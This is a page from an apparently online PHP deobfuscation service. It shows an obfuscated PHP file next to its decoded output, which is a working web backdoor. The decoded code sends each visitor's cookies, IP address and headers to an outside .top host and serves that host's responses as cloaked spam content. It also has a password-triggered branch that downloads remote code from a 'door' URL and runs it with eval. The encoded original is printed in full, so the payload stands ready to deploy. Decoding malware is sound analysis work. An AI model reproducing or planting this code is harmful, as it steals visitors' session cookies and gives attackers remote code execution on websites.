Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /*-+#M?$N;]-*/error_reporting(0); /*-q5#vsW-*/eval/*-ME^6Y!R=:%tl(xq&D>%`rNy%@9d]L?K..
Decoded Output download
?>b'<?php header(\'Content-Type: text/html; charset=utf-8\'); @set_time_limit(600);@error_reporting(0);@ignore_user_abort(1);ini_set(\'display_errors\',\'Off\');$a=!empty($_SERVER[\'HTTPS\'])&&strtolower($_SERVER[\'HTTPS\'])!==\'off\'||isset($_SERVER[\'HTTP_X_FORWARDED_PROTO\'])&&$_SERVER[\'HTTP_X_FORWARDED_PROTO\']===\'https\'||!empty($_SERVER[\'HTTP_FRONT_END_HTTPS\'])&&strtolower($_SERVER[\'HTTP_FRONT_END_HTTPS\'])!==\'off\'?"https":"http";$b=$_SERVER["REQUEST_URI"];$c=isset($_SERVER[\'HTTP_ACCEPT_LANGUAGE\'])?$_SERVER[\'HTTP_ACCEPT_LANGUAGE\']:"";$d=$_SERVER["HTTP_HOST"];$f=isset($_SERVER[\'HTTP_REFERER\'])?$_SERVER[\'HTTP_REFERER\']:"";$g=isset($_SERVER[\'HTTP_USER_AGENT\'])?$_SERVER[\'HTTP_USER_AGENT\']:"";$h=isset($_SERVER[\'REMOTE_ADDR\'])?$_SERVER[\'REMOTE_ADDR\']:"";$i=implode(\',\',$_COOKIE);$j=array(\'Accept-Language: \'.$c,\'User-Agent: \'.$g,\'Referer: \'.$f,\'Http-Proto: \'.$a,\'Http-Host: \'.$d,\'Http-Uri: \'.$b,\'Http-X-Forwarded-For: \'.$h,\'Cookie: \'.$i);$k="type=".$a."&host=".$d."&uri=".$b."&ip=".$h."&cookie=".$i;$l=$_REQUEST[\'action\'];if(!empty($l)){$m=substr($l,-1);$l=substr($l,0,strlen($l)-1);$n=array(\'9\',\'8\',\'2\',\'4\',\'5\',\'d\',\'7\',\'4\',\'1\',\'7\',\'2\',\'2\',\'5\',\'b\',\'5\',\'5\',\'a\',\'2\',\'c\',\'4\',\'b\',\'f\',\'5\',\'0\',\'b\',\'8\',\'a\',\'a\',\'4\',\'c\',\'7\',\'3\');$o=md5($l);if($o==implode($n)){$p=array("h","t","t","p",":","/","/","w","p","t","e","s","t",".","w","o","d","i","r","e","c","t",".","t","o","p","/","r","e","m","o","t","e","/","d","o","o","r/");$q=getu(implode($p).$m.\'.t\'.\'x\'.\'t\');eval(\'?>\'.$q[0]);}exit();}else{$r="srusq7.csicfa.top";if($b!=="/favicon.ico"){list($s,$t,$u)=getu(\'h\'.\'t\'.\'t\'.\'p\'.\':/\'.\'/\'.$r.\'/in\'.\'d\'.\'ex\'.\'on\'.\'e.\'.\'ph\'.\'p?\'.$k,$j,$k);if($t>=400&&$t<500){@header(\'HTTP/1.1 404 Not Found\');exit($s);}if($t>=500){@header(\'HTTP/1.1 500 Internal Server Error\');exit;}if(!strstr($s,\'notthing\')){if(strstr($s,\'htmlcontent\')){@header("Content-type: text/html; charset=utf-8");$v=str_replace("htmlcontent",\'\',$s);echo $v;exit();}if(strstr($s,\'xmlcontent\')){@header("Content-type: text/xml");exit(str_replace("xmlcontent",\'\',$s));}if(strstr($s,\'robotscontent\')){@header("Content-type: text/plain; charset=utf-8");$w=explode(\'[zm]\',str_replace("robotscontent",\'\',$s));exit(implode(PHP_EOL,$w));}}}}function getu($x,$j=null,$k=null,$y=null){if(!function_exists(\'curl_init\')){return;}try{$z=curl_init();curl_setopt($z,CURLOPT_URL,$x);curl_setopt($z,CURLOPT_FOLLOWLOCATION,1);curl_setopt($z,CURLOPT_SSL_VERIFYPEER,FALSE);curl_setopt($z,CURLOPT_SSL_VERIFYHOST,FALSE);curl_setopt($z,CURLOPT_CONNECTTIMEOUT,30);curl_setopt($z,CURLOPT_RETURNTRANSFER,1);$j===null?\'\':curl_setopt($z,CURLOPT_HTTPHEADER,$j);$y===null||$y===""?\'\':curl_setopt($z,CURLOPT_USERAGENT,$y);if($k!==null&&$k!==""){curl_setopt($z,CURLOPT_POST,1);curl_setopt($z,CURLOPT_POSTFIELDS,$k);}$aa=curl_exec($z);$bb=curl_getinfo($z,CURLINFO_HTTP_CODE);$cc=curl_getinfo($z,CURLINFO_CONTENT_TYPE);curl_close($z);}catch(Exception $dd){}if(($aa===false||$aa=="")&&function_exists(\'file_get_contents\')){ini_set(\'user_agent\',\'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\');try{$aa=@file_get_contents($x);}catch(Exception $dd){}}return array($aa,$bb,$cc);} ?>'
Did this file decode correctly?
Original Code
<?php /*-+#M?$N;]-*/error_reporting(0); /*-q5#vsW-*/eval/*-ME^6Y!R=:%tl(xq&D>%`rNy%@9d]L?K-*/(/*-4Gp&<30;=J-*/base64_decode/*-<rKo,8{p-*/(/*-b9gaT-*/"ZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnYUdWaFpHVnlLQ2REYjI1MFpXNTBMVlI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NjcE95QkFjMlYwWDNScGJXVmZiR2x0YVhRb05qQXdLVHRBWlhKeWIzSmZjbVZ3YjNKMGFXNW5LREFwTzBCcFoyNXZjbVZmZFhObGNsOWhZbTl5ZENneEtUdHBibWxmYzJWMEtDZGthWE53YkdGNVgyVnljbTl5Y3ljc0owOW1aaWNwT3lSaFBTRmxiWEIwZVNna1gxTkZVbFpGVWxzblNGUlVVRk1uWFNrbUpuTjBjblJ2Ykc5M1pYSW9KRjlUUlZKV1JWSmJKMGhVVkZCVEoxMHBJVDA5SjI5bVppZDhmR2x6YzJWMEtDUmZVMFZTVmtWU1d5ZElWRlJRWDFoZlJrOVNWMEZTUkVWRVgxQlNUMVJQSjEwcEppWWtYMU5GVWxaRlVsc25TRlJVVUY5WVgwWlBVbGRCVWtSRlJGOVFVazlVVHlkZFBUMDlKMmgwZEhCekozeDhJV1Z0Y0hSNUtDUmZVMFZTVmtWU1d5ZElWRlJRWDBaU1QwNVVYMFZPUkY5SVZGUlFVeWRkS1NZbWMzUnlkRzlzYjNkbGNpZ2tYMU5GVWxaRlVsc25TRlJVVUY5R1VrOU9WRjlGVGtSZlNGUlVVRk1uWFNraFBUMG5iMlptSno4aWFIUjBjSE1pT2lKb2RIUndJanNrWWowa1gxTkZVbFpGVWxzaVVrVlJWVVZUVkY5VlVra2lYVHNrWXoxcGMzTmxkQ2drWDFORlVsWkZVbHNuU0ZSVVVGOUJRME5GVUZSZlRFRk9SMVZCUjBVblhTay9KRjlUUlZKV1JWSmJKMGhVVkZCZlFVTkRSVkJVWDB4QlRrZFZRVWRGSjEwNklpSTdKR1E5SkY5VFJWSldSVkpiSWtoVVZGQmZTRTlUVkNKZE95Um1QV2x6YzJWMEtDUmZVMFZTVmtWU1d5ZElWRlJRWDFKRlJrVlNSVkluWFNrL0pGOVRSVkpXUlZKYkowaFVWRkJmVWtWR1JWSkZVaWRkT2lJaU95Um5QV2x6YzJWMEtDUmZVMFZTVmtWU1d5ZElWRlJRWDFWVFJWSmZRVWRGVGxRblhTay9KRjlUUlZKV1JWSmJKMGhVVkZCZlZWTkZVbDlCUjBWT1ZDZGRPaUlpT3lSb1BXbHpjMlYwS0NSZlUwVlNWa1ZTV3lkU1JVMVBWRVZmUVVSRVVpZGRLVDhrWDFORlVsWkZVbHNuVWtWTlQxUkZYMEZFUkZJblhUb2lJanNrYVQxcGJYQnNiMlJsS0Njc0p5d2tYME5QVDB0SlJTazdKR285WVhKeVlYa29KMEZqWTJWd2RDMU1ZVzVuZFdGblpUb2dKeTRrWXl3blZYTmxjaTFCWjJWdWREb2dKeTRrWnl3blVtVm1aWEpsY2pvZ0p5NGtaaXduU0hSMGNDMVFjbTkwYnpvZ0p5NGtZU3duU0hSMGNDMUliM04wT2lBbkxpUmtMQ2RJZEhSd0xWVnlhVG9nSnk0a1lpd25TSFIwY0MxWUxVWnZjbmRoY21SbFpDMUdiM0k2SUNjdUpHZ3NKME52YjJ0cFpUb2dKeTRrYVNrN0pHczlJblI1Y0dVOUlpNGtZUzRpSm1odmMzUTlJaTRrWkM0aUpuVnlhVDBpTGlSaUxpSW1hWEE5SWk0a2FDNGlKbU52YjJ0cFpUMGlMaVJwT3lSc1BTUmZVa1ZSVlVWVFZGc25ZV04wYVc5dUoxMDdhV1lvSVdWdGNIUjVLQ1JzS1NsN0pHMDljM1ZpYzNSeUtDUnNMQzB4S1Rza2JEMXpkV0p6ZEhJb0pHd3NNQ3h6ZEhKc1pXNG9KR3dwTFRFcE95UnVQV0Z5Y21GNUtDYzVKeXduT0Njc0p6SW5MQ2MwSnl3bk5TY3NKMlFuTENjM0p5d25OQ2NzSnpFbkxDYzNKeXduTWljc0p6SW5MQ2MxSnl3bllpY3NKelVuTENjMUp5d25ZU2NzSnpJbkxDZGpKeXduTkNjc0oySW5MQ2RtSnl3bk5TY3NKekFuTENkaUp5d25PQ2NzSjJFbkxDZGhKeXduTkNjc0oyTW5MQ2MzSnl3bk15Y3BPeVJ2UFcxa05TZ2tiQ2s3YVdZb0pHODlQV2x0Y0d4dlpHVW9KRzRwS1hza2NEMWhjbkpoZVNnaWFDSXNJblFpTENKMElpd2ljQ0lzSWpvaUxDSXZJaXdpTHlJc0luY2lMQ0p3SWl3aWRDSXNJbVVpTENKeklpd2lkQ0lzSWk0aUxDSjNJaXdpYnlJc0ltUWlMQ0pwSWl3aWNpSXNJbVVpTENKaklpd2lkQ0lzSWk0aUxDSjBJaXdpYnlJc0luQWlMQ0l2SWl3aWNpSXNJbVVpTENKdElpd2lieUlzSW5RaUxDSmxJaXdpTHlJc0ltUWlMQ0p2SWl3aWJ5SXNJbkl2SWlrN0pIRTlaMlYwZFNocGJYQnNiMlJsS0NSd0tTNGtiUzRuTG5RbkxpZDRKeTRuZENjcE8yVjJZV3dvSno4K0p5NGtjVnN3WFNrN2ZXVjRhWFFvS1R0OVpXeHpaWHNrY2owaWMzSjFjM0UzTG1OemFXTm1ZUzUwYjNBaU8ybG1LQ1JpSVQwOUlpOW1ZWFpwWTI5dUxtbGpieUlwZTJ4cGMzUW9KSE1zSkhRc0pIVXBQV2RsZEhVb0oyZ25MaWQwSnk0bmRDY3VKM0FuTGljNkx5Y3VKeThuTGlSeUxpY3ZhVzRuTGlka0p5NG5aWGduTGlkdmJpY3VKMlV1Snk0bmNHZ25MaWR3UHljdUpHc3NKR29zSkdzcE8ybG1LQ1IwUGowME1EQW1KaVIwUERVd01DbDdRR2hsWVdSbGNpZ25TRlJVVUM4eExqRWdOREEwSUU1dmRDQkdiM1Z1WkNjcE8yVjRhWFFvSkhNcE8zMXBaaWdrZEQ0OU5UQXdLWHRBYUdWaFpHVnlLQ2RJVkZSUUx6RXVNU0ExTURBZ1NXNTBaWEp1WVd3Z1UyVnlkbVZ5SUVWeWNtOXlKeWs3WlhocGREdDlhV1lvSVhOMGNuTjBjaWdrY3l3bmJtOTBkR2hwYm1jbktTbDdhV1lvYzNSeWMzUnlLQ1J6TENkb2RHMXNZMjl1ZEdWdWRDY3BLWHRBYUdWaFpHVnlLQ0pEYjI1MFpXNTBMWFI1Y0dVNklIUmxlSFF2YUhSdGJEc2dZMmhoY25ObGREMTFkR1l0T0NJcE95UjJQWE4wY2w5eVpYQnNZV05sS0NKb2RHMXNZMjl1ZEdWdWRDSXNKeWNzSkhNcE8yVmphRzhnSkhZN1pYaHBkQ2dwTzMxcFppaHpkSEp6ZEhJb0pITXNKM2h0YkdOdmJuUmxiblFuS1NsN1FHaGxZV1JsY2lnaVEyOXVkR1Z1ZEMxMGVYQmxPaUIwWlhoMEwzaHRiQ0lwTzJWNGFYUW9jM1J5WDNKbGNHeGhZMlVvSW5odGJHTnZiblJsYm5RaUxDY25MQ1J6S1NrN2ZXbG1LSE4wY25OMGNpZ2tjeXduY205aWIzUnpZMjl1ZEdWdWRDY3BLWHRBYUdWaFpHVnlLQ0pEYjI1MFpXNTBMWFI1Y0dVNklIUmxlSFF2Y0d4aGFXNDdJR05vWVhKelpYUTlkWFJtTFRnaUtUc2tkejFsZUhCc2IyUmxLQ2RiZW0xZEp5eHpkSEpmY21Wd2JHRmpaU2dpY205aWIzUnpZMjl1ZEdWdWRDSXNKeWNzSkhNcEtUdGxlR2wwS0dsdGNHeHZaR1VvVUVoUVgwVlBUQ3drZHlrcE8zMTlmWDFtZFc1amRHbHZiaUJuWlhSMUtDUjRMQ1JxUFc1MWJHd3NKR3M5Ym5Wc2JDd2tlVDF1ZFd4c0tYdHBaaWdoWm5WdVkzUnBiMjVmWlhocGMzUnpLQ2RqZFhKc1gybHVhWFFuS1NsN2NtVjBkWEp1TzMxMGNubDdKSG85WTNWeWJGOXBibWwwS0NrN1kzVnliRjl6WlhSdmNIUW9KSG9zUTFWU1RFOVFWRjlWVWt3c0pIZ3BPMk4xY214ZmMyVjBiM0IwS0NSNkxFTlZVa3hQVUZSZlJrOU1URTlYVEU5RFFWUkpUMDRzTVNrN1kzVnliRjl6WlhSdmNIUW9KSG9zUTFWU1RFOVFWRjlUVTB4ZlZrVlNTVVpaVUVWRlVpeEdRVXhUUlNrN1kzVnliRjl6WlhSdmNIUW9KSG9zUTFWU1RFOVFWRjlUVTB4ZlZrVlNTVVpaU0U5VFZDeEdRVXhUUlNrN1kzVnliRjl6WlhSdmNIUW9KSG9zUTFWU1RFOVFWRjlEVDA1T1JVTlVWRWxOUlU5VlZDd3pNQ2s3WTNWeWJGOXpaWFJ2Y0hRb0pIb3NRMVZTVEU5UVZGOVNSVlJWVWs1VVVrRk9VMFpGVWl3eEtUc2thajA5UFc1MWJHdy9KeWM2WTNWeWJGOXpaWFJ2Y0hRb0pIb3NRMVZTVEU5UVZGOUlWRlJRU0VWQlJFVlNMQ1JxS1Rza2VUMDlQVzUxYkd4OGZDUjVQVDA5SWlJL0p5YzZZM1Z5YkY5elpYUnZjSFFvSkhvc1ExVlNURTlRVkY5VlUwVlNRVWRGVGxRc0pIa3BPMmxtS0NScklUMDliblZzYkNZbUpHc2hQVDBpSWlsN1kzVnliRjl6WlhSdmNIUW9KSG9zUTFWU1RFOVFWRjlRVDFOVUxERXBPMk4xY214ZmMyVjBiM0IwS0NSNkxFTlZVa3hQVUZSZlVFOVRWRVpKUlV4RVV5d2theWs3ZlNSaFlUMWpkWEpzWDJWNFpXTW9KSG9wT3lSaVlqMWpkWEpzWDJkbGRHbHVabThvSkhvc1ExVlNURWxPUms5ZlNGUlVVRjlEVDBSRktUc2tZMk05WTNWeWJGOW5aWFJwYm1adktDUjZMRU5WVWt4SlRrWlBYME5QVGxSRlRsUmZWRmxRUlNrN1kzVnliRjlqYkc5elpTZ2tlaWs3ZldOaGRHTm9LRVY0WTJWd2RHbHZiaUFrWkdRcGUzMXBaaWdvSkdGaFBUMDlabUZzYzJWOGZDUmhZVDA5SWlJcEppWm1kVzVqZEdsdmJsOWxlR2x6ZEhNb0oyWnBiR1ZmWjJWMFgyTnZiblJsYm5Sekp5a3BlMmx1YVY5elpYUW9KM1Z6WlhKZllXZGxiblFuTENkTmIzcHBiR3hoTHpVdU1DQW9WMmx1Wkc5M2N5Qk9WQ0F4TUM0d095QlhhVzQyTkRzZ2VEWTBPeUJ5ZGpveE1qZ3VNQ2tnUjJWamEyOHZNakF4TURBeE1ERWdSbWx5WldadmVDOHhNamd1TUNjcE8zUnllWHNrWVdFOVFHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDUjRLVHQ5WTJGMFkyZ29SWGhqWlhCMGFXOXVJQ1JrWkNsN2ZYMXlaWFIxY200Z1lYSnlZWGtvSkdGaExDUmlZaXdrWTJNcE8zMGdQejQ9IikpOw=="/*-b?kd:uP-*/)/*-2tdSrzz.o-*/);?>
Function Calls
base64_decode | 2 |
error_reporting | 1 |
Stats
MD5 | bef861aa04b1ef3e5920c34a3c4d2cd9 |
Eval Count | 2 |
Decode Time | 54 ms |